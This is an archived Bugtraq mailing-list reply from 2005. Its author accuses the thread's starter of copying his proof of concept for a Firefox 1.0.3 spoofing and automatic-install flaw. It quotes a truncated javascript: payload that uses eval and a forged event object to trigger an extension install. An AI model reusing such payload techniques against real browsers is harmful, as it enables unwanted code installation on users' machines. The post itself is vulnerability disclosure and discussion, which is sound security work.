Re: firefox 1.0.3 spoof+auto dl

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: firefox 1.0.3 spoof+auto dl
From: Paul <paul@xxxxxxxxxxxxxxxx>
Date: 8 May 2005 13:01:48 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

In-Reply-To: <20050507173037.20610.qmail@xxxxxxxxxxxxxxxxxxxxx>

This is the copy of my PoC. The person responsible for the leak of my remote 
compromise is the starter of this thread. In fact, he copies some of the code 
directly from my PoC:

javascript:'<noscript>'+eval('if 
(window.name!=\'stealcookies\'){window.name=\'stealcookies\';}  else{ 
event={target:{href:\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You
 are vulnerable!!!

That is the window name, object creater, even direct string copies from my 
site. This guy is incredible.

Paul

Prev by Date: Advanced Guestbook 2.3.1
Next by Date: Firefox Remote Compromise Technical Details
Previous by thread: firefox 1.0.3 spoof+auto dl
Next by thread: [ GLSA 200505-04 ] GnuTLS: Denial of Service vulnerability
Index(es):
- Date
- Thread